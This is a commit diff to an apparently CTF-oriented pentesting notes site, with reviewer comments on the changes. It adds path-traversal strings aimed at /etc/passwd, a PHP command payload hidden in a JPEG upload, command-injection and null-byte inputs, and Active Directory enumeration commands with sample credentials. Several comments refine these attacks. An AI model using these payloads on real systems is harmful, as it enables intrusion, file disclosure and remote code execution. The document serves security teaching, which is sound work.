updated some techniques
hideckies committed Dec 12, 2024
1 parent 7cf115b commit bda6807
Showing 6 changed files with 78 additions and 32 deletions.
Expand Up @@ -4,7 +4,7 @@ description: Buffer overflow occurs when a program attempts to write more data t
tags:
- Reverse Engineering
refs:
date: 2023-08-14
date: 2024-12-12
draft: false
---

Expand Down Expand Up @@ -172,10 +172,10 @@ r.interactive()

<br />

## Shellcode
## Shellcode Injection

We can create the crafted shell code and override the address to execute the shell code.
Use **Pwntools** to create the shell code.
We can create the crafted shellcode and override the address to execute the shellcode.
Use **Pwntools** to create the shellcode.

```python
from pwn import *
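Review bot: "override the address" in the rewritten sentence should be "overwrite the return address", which is what the technique actually does; renaming the heading to "Shellcode Injection" is fine, but the section still states no prerequisite. Injected shellcode only runs if the memory it lands in is executable (NX/DEP disabled), so add a check before the Pwntools snippet, e.g. "Confirm NX is disabled with `checksec ./binary` (look for `NX: NX disabled`); if NX is enabled, use ROP/ret2libc instead of injecting shellcode."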
3 changes: 2 additions & 1 deletion src/exploit/web/security-risk/file-inclusion.md
Expand Up @@ -5,7 +5,7 @@ tags:
- Web
refs:
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
date: 2024-11-08
date: 2024-12-12
draft: false
---

Expand All @@ -16,6 +16,7 @@ draft: false
?page=/etc/passwd
?page=../../../../etc/passwd
?page=../../../../../etc/passwd
?page=..././..././..././..././etc/passwd
?page=..//..//..//..//..//etc/passwd
?page=....//....//....//....//etc/passwd
?page=....//....//....//....//....//....//etc/passwd
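Review bot: the new `..././` payload only works against a filter that strips `../` in a single non-recursive pass (`..././` minus one `../` leaves `../`), which is the same assumption the `....//` variants below it rely on, yet nothing in the block says which filter each form defeats. Add a short comment per variant, e.g. `# survives a single non-recursive strip of ../`, so a reader can pick the matching bypass instead of trying every line; the `..//` form above targets a different normalization behaviour and deserves its own comment.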
21 changes: 20 additions & 1 deletion src/exploit/web/security-risk/file-upload-attack.md
Expand Up @@ -6,7 +6,7 @@ tags:
refs:
- https://docstore.mik.ua/orelly/web2/wdesign/ch19_01.htm
- https://saadahmedx.medium.com/exploiting-auto-save-functionality-to-steal-login-credentials-bf4c7e1594da
date: 2024-10-25
date: 2024-12-12
draft: false
---

Expand Down Expand Up @@ -250,6 +250,25 @@ RIFF????WAVE

<br />

## Combine payload into image file

The payload can be executed by combining into an image file data.
For example, generate a blank image file at first:

```bash
convert -size 32x32 xc:white test.jpg
```

And then we can put our payload to the end of the image data:

```txt
ÿØÿàJFIFHHÿÛC
$.' ",#(7),01444'9=82<.342ÿÀ ÿÄÿÄÿÚ?
<?php echo system("whoami");?>
```

<br />

## Zip

If target website restricts uploads to zip files only, the website (server) may unzip uploaded files internally and displays the result of decompressed file somewhere e.g. `/upload/example.txt`.
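Review bot: the PHP appended in the `txt` block executes only if the server runs the upload through the PHP interpreter (a `.php`/`.phtml` extension that survives the upload check, a handler misconfigured for `.jpg`, or a later local file inclusion of the uploaded file); a file served as `image/jpeg` just displays, so "The payload can be executed by combining into an image file data" overpromises and should state that precondition. The mojibake bytes on the two lines before `<?php` cannot be reproduced by copy-paste; replace them with the command that produces the file, e.g. `printf '<?php echo system("whoami");?>' >> test.jpg` (appends after the end-of-image marker) or `exiftool -Comment='<?php echo system("whoami");?>' test.jpg` (puts the payload in a metadata field, which survives some re-encoders better). Also name ImageMagick next to `convert`, since it is not installed by default.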
18 changes: 17 additions & 1 deletion src/exploit/web/security-risk/os-command-injection.md
Expand Up @@ -6,7 +6,7 @@ tags:
- Reverse Shell
- Web
refs:
date: 2024-10-25
date: 2024-12-12
draft: false
---

Expand Down Expand Up @@ -38,6 +38,8 @@ If the payload includes whitespaces (**' '**), we need to change it to **'+'** o
/?cmd=ls ..
/?cmd=ls ../
/?cmd=ls /home
<!-- Comment out at the end to ignore subsequent command/code. -->
?cmd=ls /home #
/?cmd=`ping -c 1 10.0.0.1`
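Review bot: `?cmd=ls /home #` never reaches the server as written: `#` begins the URL fragment, so the browser or curl drops everything from it onward and the application sees `ls /home ` with no comment at all; the sentence at the top of this hunk already says spaces must become `+` or `%20`. Encode it as `/?cmd=ls+/home+%23` (leading slash to match the sibling lines). The explanatory line is an HTML comment `<!-- ... -->` inside a code block, where it renders literally; use a `#` comment line like the ones in the Null-terminator block added further down in this file.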
Expand Down Expand Up @@ -85,6 +87,20 @@ We may be able to bypass specific character filter by encoding them.

<br />

## Null-terminator

Sometimes, we need to put a null-terminator to ignore subsequent code given by the target application.

```bash
# URL encoding (%00)
?cmd=ls /home%00
# Escape sequence (\0, \00)
?cmd=ls /home\0
?cmd=ls /home\00
```

<br />

## Bypass Whitespace Filter

Reference: [https://www.ctfnote.com/web/os-command-injection/whitespace-bypass](https://www.ctfnote.com/web/os-command-injection/whitespace-bypass)
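Review bot: the `\0` and `\00` lines at the end of the new block are not null bytes when sent in a query string; they are a backslash followed by digits, and a POSIX shell turns an unquoted `\0` into `0`, so `ls /home\0` runs `ls /home0`. Only `%00` is URL-decoded into a real NUL by the web server, and even that truncates only when the application hands the string to a C-style API (the classic case being a fixed suffix such as `.txt` that the application appends). Either drop the escape-sequence lines or qualify them as applying only when the target itself interprets escapes (for example through `printf` or `$'...'`). The lead sentence "ignore subsequent code given by the target application" should say what is being cut off: a suffix the application appends to our input.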
57 changes: 34 additions & 23 deletions src/exploit/windows/active-directory/index.md
Expand Up @@ -8,7 +8,7 @@ tags:
refs:
- https://tryhackme.com/room/adenumeration
- https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
date: 2024-12-06
date: 2024-12-12
draft: false
---

Expand All @@ -32,6 +32,7 @@ The following command starts the Docker Compose of the BloodHound.

```bash
curl -L https://ghst.ly/getbhce > docker-compose.yml
sudo docker-compose down -v # If you want to reset the password of BloodHound...
sudo docker-compose pull && sudo docker-compose up
```
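Review bot: the comment on `sudo docker-compose down -v` undersells what it does: `-v` deletes the named volumes, i.e. the whole BloodHound database (Neo4j and Postgres), not just the initial password, so every ingested graph is lost. Reword it to something like `# Wipes the database and regenerates the initial admin password; all ingested data is lost`, and keep it out of the normal start sequence, since placed between the download and `docker-compose up` it reads as a step to run every time.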

Expand All @@ -45,32 +46,42 @@ export BLOODHOUND_HOST=10.0.0.1
export BLOODHOUND_PORT=8090
```

### 2. Collect Data with BloodHound.py
### 2. Collect Data

Here we use [BloodHound.py](https://github.com/dirkjanm/BloodHound.py).
Install it as follow:
- **Option1. Using NetExec**

```sh
python3 -m venv venv
source venv/bin/activate
pip3 install bloodhound
bloodhound-python -h
```
If you already have `NetExec` in your machine, I think it is the most easiest way.

Then
```sh
netexec ldap <target-ip> -d example.local -u username -p password --dns-server <target-ip> --bloodhound -c All
```

```bash
# -d: Domain
# -u: Username
# -p: Password
# -dc: Domain Controller
# -c all: Collect all data
# -ns: Alternate the nameserver
bloodhound-python -d example.local -u 'TABATHA_BRITT' -p 'marlboro(1985)' -dc dc.example.local -c all -ns ns.example.local

# If we cannot resolve the domain, try dnschef (https://github.com/iphelix/dnschef) to create a fake DNS by proxy.
sudo python3 dnschef.py --fakeip <target-ip> --nameserver <target-ip>
```
- **Option2. Using BloodHound.py**

We can also use [BloodHound.py](https://github.com/dirkjanm/BloodHound.py).
Install it as follow:

```sh
python3 -m venv .venv
source .venv/bin/activate
pipx install bloodhound # or using 'pip3' instead of 'pipx'
bloodhound-python -h
```

Then collect data:

```bash
# -d: Domain
# -u: Username
# -p: Password
# -dc: Domain Controller
# -c all: Collect all data
# -ns: Alternate the nameserver
bloodhound-python -d example.local -u 'TABATHA_BRITT' -p 'marlboro(1985)' -dc dc.example.local -c all -ns ns.example.local
# If we cannot resolve the domain, try dnschef (https://github.com/iphelix/dnschef) to create a fake DNS by proxy.
sudo python3 dnschef.py --fakeip <target-ip> --nameserver <target-ip>
```

### 3. Upload Collected Data

3 changes: 1 addition & 2 deletions src/exploit/windows/privilege-escalation/index.md
Expand Up @@ -8,7 +8,7 @@ tags:
refs:
- https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
- https://learn.microsoft.com/en-us/powershell/scripting/samples/working-with-registry-keys?view=powershell-7.3
date: 2024-12-06
date: 2024-12-12
draft: false
---

Expand Down Expand Up @@ -252,7 +252,6 @@ We might be able to find interesting information about users by checking histori
VSS coordinates the actions that are required to create a consistent a shadow copy (also known as a snapshot or a point-in-time copy) of the data that is to be backed up.

```powershell
vssadmin
vssadmin list shadows
vssadmin list volumes
```
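Review bot: removing the bare `vssadmin` line is fine, but the two commands that remain only enumerate shadow copies, while the sentence above promises historical user data; the section should show how to read one, e.g. `copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Temp\SAM` using the device path printed by `vssadmin list shadows`, and note that `vssadmin` needs an elevated prompt. The context line "create a consistent a shadow copy" has a stray "a".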
